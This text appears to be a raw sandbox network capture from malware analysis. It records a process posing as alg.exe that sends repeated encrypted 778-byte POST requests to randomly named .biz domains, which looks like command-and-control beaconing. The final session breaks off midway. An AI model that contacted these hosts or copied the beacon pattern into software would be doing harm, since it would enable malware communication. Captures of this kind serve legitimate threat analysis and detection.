                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  72192.168.2.55004854.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:52.633246899 CET356OUTPOST /cssyiwvwfakxyln HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:52.633289099 CET778OUTData Raw: fe 6a 6c 86 07 8d 8f bc fe 02 00 00 2b 1c a1 76 d5 ed 9b 5e 4c 7c 48 2e 3a a1 bb 78 5e f4 99 37 91 7a 54 6d c3 ec 53 64 a2 53 23 c2 aa 60 cf f3 bc 03 e9 f5 39 0d e7 4d 62 3b af 59 db 35 06 34 58 2a 5b 8d 66 8c 64 e8 73 07 5a e1 9d a2 6b eb 13 1a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: jl+v^L|H.:x^7zTmSdS#`9Mb;Y54X*[fdsZkJQZNPm9Lo <kRl@eBusNXihp7/7!^\(C(\0[SN#.N}lwK8,m"=QdE<#iMSwG@}x.2b~M
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:53.479470968 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=2d7a26618c254e15df1440ab7edb22fe|155.94.241.188|1730130713|1730130713|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  73192.168.2.55004954.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:53.503767967 CET346OUTPOST /asvi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:53.503797054 CET778OUTData Raw: 28 21 9a 2d eb fd d2 67 fe 02 00 00 a5 4a f6 3a 79 03 5b 41 9b 3b ae f1 0c 26 07 ce 28 18 25 43 fd 28 fb d9 59 b9 4f 1f 9b 73 f8 f6 ba 93 09 b6 b5 5c 72 61 23 eb 40 db f3 cd 53 89 f7 f9 03 59 f0 20 0b a7 1e 2a de 70 61 76 d5 10 ea fa 84 29 c8 48
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: (!-gJ:y[A;&(%C(YOs\ra#@SY *pav)HBXN#p^0n{[]8w{]mZc5r1_2}4~|bJ/8Fx$q-3w^M?{@4q0,+8+wM*_]$
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:54.333273888 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=c1d3183ad2bebd53e89b7a69197984f1|155.94.241.188|1730130714|1730130714|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  74192.168.2.55005018.246.231.120802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:54.354605913 CET354OUTPOST /dnnoxqpiwspjj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:54.354635000 CET778OUTData Raw: ec 48 8b ea c8 ed 2e 8b fe 02 00 00 d9 38 e5 44 52 2a 78 12 c5 ea cf 89 ce b6 8a 68 ab 41 3d a4 12 a2 06 34 8a 4a 8e e4 6f f2 eb 09 8d da a5 cf 75 9a 90 dd bf ec db 39 b7 ee 54 5e 3e 41 ff 65 6d 32 3d 8e c2 f8 df 5a 7f 4e d9 3b a6 93 d6 45 20 8d
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: H.8DR*xhA=4Jou9T^>Aem2=ZN;E p;|wz^Xvo'3nv}nZC3kp,2z&e28@:/l\m\PpM_?IZc;TK5t' yKpDZCZ#
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.194593906 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=9f233f36ed594b882eda9049fb36df9f|155.94.241.188|1730130715|1730130715|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  75192.168.2.55005118.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.654402971 CET352OUTPOST /srcxcicm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.654433966 CET778OUTData Raw: 77 13 b1 70 9b 56 1f c7 fe 02 00 00 1b 23 db cf 18 d6 06 a4 ae 8e c3 b7 01 ea 13 fd d6 a1 ea cb 1e 11 43 53 ae d0 3d d8 39 dc 1a 5e 71 2e 43 e4 c9 54 da 71 de fe f0 d8 d0 62 ca 86 82 87 87 1a 92 65 e8 25 9f 78 05 e9 b9 8f fe 1a e1 0e 84 b9 c6 69
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: wpV#CS=9^q.CTqbe%xi.h<1;,}e(n7D~me>q/?~Wo%10:W#CM:/6mH[t|%W*+o{fPev5@2gyx$
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.322695017 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=6e41551babe52d46a5c6b4b7b0b96913|155.94.241.188|1730130716|1730130716|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  76192.168.2.55005244.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.342493057 CET354OUTPOST /ydbxvrfdujat HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.342518091 CET778OUTData Raw: 6f 35 62 8d 65 81 34 35 fe 02 00 00 4e c4 02 d0 73 e9 e4 10 9b 2d 39 4f 85 11 59 0f ab 8c 39 4d ed 2a f0 22 74 1a 3a 03 f2 20 af 97 3b 56 9b 8a 00 c0 6c ad d5 65 e2 55 95 97 38 00 3e 26 f1 10 bd 30 af 6e cc 1d bd a7 2d db d0 2a 3d c2 b0 0e 5f ab
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: o5be45Ns-9OY9M*"t: ;VleU8>&0n-*=_F%S$*b#;?5?9&3!>Km21W]|]M$#)6NFUO{#@QWu:TwtJDL@F:@UXY
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.040076017 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=18e8389e49648dcd77c0c6416d712d1c|155.94.241.188|1730130716|1730130716|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  77192.168.2.55005372.52.178.23802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.068813086 CET356OUTPOST /otrjjjdmycgv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.068835020 CET778OUTData Raw: 9b 1d 95 a0 d8 18 d1 ae fe 02 00 00 b5 65 82 e5 50 64 c4 7c 89 8a 1d 1a 60 af 87 e7 ec 8d 9f 1e fb a3 3c be b3 da 31 cd bc 3c 05 f9 1f 19 9b f9 86 33 8b 45 9d f1 30 af 6e 49 aa 35 ca d3 08 82 29 4f e9 a5 16 7d 77 f9 5b 49 a3 25 c9 9f ee 5c 36 82
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ePd|`<1<3E0nI5)O}w[I%\6{B(=,&s&/EF6>L)[aky3%h[&+yL7sJiCuO'D<;0h5:~(,DoE_'@t_ mHsL242]r]gZa#<


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  78192.168.2.55005472.52.178.23802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.912318945 CET357OUTPOST /klxaypeiwoubq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.912353992 CET778OUTData Raw: 5c 48 be 5d 6a b1 05 42 fe 02 00 00 23 67 22 d8 c3 81 3e 08 64 1f 3e 5d a8 0a 0f 88 a0 f5 ec 44 97 94 31 a0 ef f3 c5 fc 6a c4 25 23 a9 61 d9 3b 80 ce 7c e9 39 0f fb 6a 34 c7 fe 7a 35 e3 46 f4 9b d5 45 2f 72 79 f7 b1 58 60 6b 46 e5 4d fc 08 9f 0c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: \H]jB#g">d>]D1j%#a;|9j4z5FE/ryX`kFMmXmk~h%Q[d0/M<CQ?lRm9zu!I:+M)pm^5cs~"l-&`:*lulfpZ-1[YDj']sw


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  79192.168.2.55005544.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.748231888 CET355OUTPOST /mcduyucxmuwka HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.748266935 CET778OUTData Raw: ec a8 2c 25 9e 35 da 5a fe 02 00 00 4d 6e 10 57 c0 56 36 3a 19 30 03 2a c3 a8 c7 a0 6b 50 b9 ef 48 94 7a 5c 83 96 a9 74 cc b8 4c ba 7f b9 f5 34 ac 3a 72 94 a6 f3 f1 71 81 83 0e 82 eb 0d 8b 94 51 ff 1c b3 9e be 32 13 c3 8b 7f 54 15 6c 1c 73 d0 b9
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ,%5ZMnWV6:0*kPHz\tL4:rqQ2TlsRz3]wbP:ku=4n5@)z:v(>o;=,'HB}g{fX<Zpv:#R)7d%xK/+9D)cH_4a,R"jP7
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.424982071 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=8cdec651ec65576248b11ede47545667|155.94.241.188|1730130719|1730130719|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  80192.168.2.55005618.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445733070 CET353OUTPOST /hrucffqs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445733070 CET778OUTData Raw: e7 c6 a5 42 b2 b7 18 58 fe 02 00 00 09 a7 8a 1f 3a 5c 7e 29 24 8d eb 05 f8 3c 62 b3 51 83 7b 16 d9 27 d5 c8 f7 2e 85 a3 53 1a 3a dc 8c e9 36 e6 bf ed 73 24 ba ea 36 eb a2 2c 95 ee 61 2b fe d1 af 6e 10 ae 8c 85 3e c6 78 50 53 9f 02 d0 cd b3 9e d6
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: BX:\~)$<bQ{'.S:6s$6,a+n>xPSz:Y/(bV)8h|V&HO'wQ<@KC&&~WH8fi?lW)x+T%kZ&6yK8#`##XsR;R;x,(UA:E"?_]/
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.889324903 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=55909511bd39f7be112632d57893cecb|155.94.241.188|1730130720|1730130720|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  81192.168.2.55005718.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.910176039 CET343OUTPOST /rc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.910197973 CET778OUTData Raw: a1 2b 80 53 56 0f 0e 41 fe 02 00 00 36 d4 c5 80 21 41 5e e6 fd af 90 d4 06 13 31 6b 70 bc dc 80 9b f6 80 de 9a 2a c1 11 c9 da 5b f5 ae fd 12 a6 65 40 3b 45 ab 8f fb c5 b7 12 0f 94 4a 1e 04 dd 98 c1 db 04 e0 86 3c be eb 26 58 ee 12 16 48 79 dc 25
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: +SVA6!A^1kp*[e@;EJ<&XHy%b:=HWKPQC#7"[7Bh9*Gc+N?;X5Fr*PY!/YPyA?S>qJzbv_ghcm.]tMCi_38gZx4J$eSM&v
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.563652992 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=da0c287f76832482c945062ca3933cf3|155.94.241.188|1730130721|1730130721|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  82192.168.2.550058172.234.222.138802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.585447073 CET349OUTPOST /lmpk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
